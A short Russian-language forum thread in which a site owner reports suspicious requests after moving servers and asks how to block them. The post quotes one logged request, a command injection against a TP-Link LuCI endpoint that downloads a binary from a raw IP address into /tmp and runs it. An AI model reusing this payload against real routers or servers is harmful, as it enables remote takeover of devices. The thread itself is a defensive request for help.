Rashp Posted June 27, 2024 at 01:45 AM Share Posted June 27, 2024 at 01:45 AM (edited) Всем здравствуйте, после переезда на новые сервера, столкнулся по странными запросами вот такого вида: /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) пытаются грузить на сервер shell и получить доступ к сайту, стандартные методы борьбы не особо помогают, менял права на /tmp на 755, 775, но сайт падает на 500, где сайт и /tmp могут быть связаны и как можно купировать эту проблему? Edited June 27, 2024 at 01:49 AM by Rashp 0 Quote Link to comment Share on other sites More sharing options...
Rashp Posted June 27, 2024 at 11:20 AM Author Share Posted June 27, 2024 at 11:20 AM Знающие, ответьте пожалуйста. 0 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.